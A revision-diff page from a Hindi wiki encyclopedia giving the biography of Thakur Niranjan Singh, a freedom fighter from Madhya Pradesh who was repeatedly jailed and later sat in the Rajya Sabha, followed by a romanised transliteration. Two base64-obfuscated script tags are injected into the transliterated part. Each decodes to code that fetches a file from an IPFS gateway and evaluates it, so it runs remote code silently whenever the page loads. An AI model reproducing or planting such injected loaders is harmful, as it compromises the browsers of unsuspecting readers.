Difference between revisions of "ठाकुर निरंजन सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} ठाकुर निरंजन सिंह (जन्म- नरसिंहपुर ज़िल...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "विरूद्ध" to "विरुद्ध")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
ठाकुर निरंजन सिंह (जन्म-[[जनवरी]], [[1903]] नरसिंहपुर ज़िला [[मध्य प्रदेश]] मृत्यु-[[1968]]) मध्य प्रदेश के प्रमुख राजनीतिक व्यक्ति थे।
ठाकुर निरंजन सिंह (जन्म- नरसिंहपुर ज़िले में [[जनवरी]], [[1903]], मृत्यु-[[1968]]) [[मध्य प्रदेश]] के प्रमुख राजनीतिक व्यक्ति थे।
 
 
==जीवन परिचय==
 
==जीवन परिचय==
 
ठाकुर निरंजन सिंह का जन्म नरसिंहपुर ज़िले में जनवरी 1903 हुआ था। ठाकुर निरंजन शिक्षा प्राप्त करने के लिए खंडवा भेजे गए तो वहाँ राष्ट्रवादी कवि पंडित [[माखनलाल चतुर्वेदी]] के प्रभाव में आ गए। फलतः [[1921]] के असहयोग आंदोलन में विद्यालय का बहिष्कार कर दिया और [[1923]] के [[नागपुर]] के झंग सत्याग्रह में भाग लेने पर गिरफ्तार कर लिए गए। आंदोलन धीमा पड़ने पर पुनः अध्ययन करने के लिए जब वे [[आगरा]] पहुंचे तो वहाँ उन्हें प्रेरित करने के लिए श्रीकृष्णदत्त पालीवाल पहले से मौजूद थे।  
 
ठाकुर निरंजन सिंह का जन्म नरसिंहपुर ज़िले में जनवरी 1903 हुआ था। ठाकुर निरंजन शिक्षा प्राप्त करने के लिए खंडवा भेजे गए तो वहाँ राष्ट्रवादी कवि पंडित [[माखनलाल चतुर्वेदी]] के प्रभाव में आ गए। फलतः [[1921]] के असहयोग आंदोलन में विद्यालय का बहिष्कार कर दिया और [[1923]] के [[नागपुर]] के झंग सत्याग्रह में भाग लेने पर गिरफ्तार कर लिए गए। आंदोलन धीमा पड़ने पर पुनः अध्ययन करने के लिए जब वे [[आगरा]] पहुंचे तो वहाँ उन्हें प्रेरित करने के लिए श्रीकृष्णदत्त पालीवाल पहले से मौजूद थे।  
 
==जेल यात्रा==
 
==जेल यात्रा==
ठाकुर निरंजन सिंह का समय राष्ट्रीय आंदोलन में भाग लेने और जेल की सजाएं काटने में बीतता रहा। [[1930]], [[1931]], [[1932]], [[1933]] और [[1940]] में उन्हें गिरफ्तार किया गया। [[1942]] में वे भूमिगत हो गए थे। बाद में गिरफ्तार करके सेंट्रल जेल में डाले गए तो बरसात की एक रात में जेल की ऊँची दीवारों को लांघकर फरार हो गए। फरारी का यह जीवन उन्होंने साधु का वेश धारण करके विदेशी सरकार के विरूद्ध आंदोलन को गति प्रदान करने में बिताया। बाद में जब पकड़े गए तो पैरों में बेड़ी और हाथों में हथकड़ी डालकर उन्हें 6 महीने अलग कोठरी में बंद रखा गया था।  
+
ठाकुर निरंजन सिंह का समय राष्ट्रीय आंदोलन में भाग लेने और जेल की सजाएं काटने में बीतता रहा। [[1930]], [[1931]], [[1932]], [[1933]] और [[1940]] में उन्हें गिरफ्तार किया गया। [[1942]] में वे भूमिगत हो गए थे। बाद में गिरफ्तार करके सेंट्रल जेल में डाले गए तो बरसात की एक रात में जेल की ऊँची दीवारों को लांघकर फरार हो गए। फरारी का यह जीवन उन्होंने साधु का वेश धारण करके विदेशी सरकार के विरुद्ध आंदोलन को गति प्रदान करने में बिताया। बाद में जब पकड़े गए तो पैरों में बेड़ी और हाथों में हथकड़ी डालकर उन्हें 6 महीने अलग कोठरी में बंद रखा गया था।  
 
==सदस्यता==
 
==सदस्यता==
ठाकुर निरंजन सिंह दो बार मध्य प्रदेश विधान सभा के सदस्य रहे। उन्होंने कांग्रेस छोड़कर ‘किसान-मजदूर प्रजा पार्टी’ की सदस्यता ग्रहण कर ली थी। [[1958]] में वे राज्यसभा के सदस्य चुने गए।  
+
ठाकुर निरंजन सिंह दो बार मध्य प्रदेश विधान सभा के सदस्य रहे। उन्होंने कांग्रेस छोड़कर ‘किसान-मज़दूर प्रजा पार्टी’ की सदस्यता ग्रहण कर ली थी। [[1958]] में वे राज्यसभा के सदस्य चुने गए।  
 
==मृत्यु==
 
==मृत्यु==
ठाकुर निरंजन सिंह की मृत्यु1968 में हुई थी।<ref>{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =348 से 349| chapter = }}</ref>
+
ठाकुर निरंजन सिंह की मृत्यु 1968 में हुई थी।
  
 
{{प्रचार}}
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =348 से 349| chapter = }}
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
[[Category:नया पन्ना]]
+
{{स्वतन्त्रता सेनानी}}
 +
[[Category:स्वतन्त्रता सेनानी]]
 +
[[Category:इतिहास कोश]]
 +
[[Category:चरित कोश]]
 +
[[Category:राजनीतिज्ञ]]
 +
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 15:26, 17 October 2015

thakur niranjan sianh (janm-janavari, 1903 narasianhapur zila madhy pradesh mrityu-1968) madhy pradesh ke pramukh rajanitik vyakti the.

jivan parichay

thakur niranjan sianh ka janm narasianhapur zile mean janavari 1903 hua tha. thakur niranjan shiksha prapt karane ke lie khandava bheje ge to vahaan rashtravadi kavi pandit makhanalal chaturvedi ke prabhav mean a ge. phalatah 1921 ke asahayog aandolan mean vidyalay ka bahishkar kar diya aur 1923 ke nagapur ke jhang satyagrah mean bhag lene par giraphtar kar lie ge. aandolan dhima p dane par punah adhyayan karane ke lie jab ve agara pahuanche to vahaan unhean prerit karane ke lie shrikrishnadatt palival pahale se maujood the.

jel yatra

thakur niranjan sianh ka samay rashtriy aandolan mean bhag lene aur jel ki sajaean katane mean bitata raha. 1930, 1931, 1932, 1933 aur 1940 mean unhean giraphtar kiya gaya. 1942 mean ve bhoomigat ho ge the. bad mean giraphtar karake seantral jel mean dale ge to barasat ki ek rat mean jel ki ooanchi divaroan ko laanghakar pharar ho ge. pharari ka yah jivan unhoanne sadhu ka vesh dharan karake videshi sarakar ke viruddh aandolan ko gati pradan karane mean bitaya. bad mean jab pak de ge to pairoan mean be di aur hathoan mean hathak di dalakar unhean 6 mahine alag kothari mean band rakha gaya tha.

sadasyata

thakur niranjan sianh do bar madhy pradesh vidhan sabha ke sadasy rahe. unhoanne kaangres chho dakar ‘kisan-mazadoor praja parti’ ki sadasyata grahan kar li thi. 1958 mean ve rajyasabha ke sadasy chune ge.

mrityu

thakur niranjan sianh ki mrityu 1968 mean huee thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 348 se 349.

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>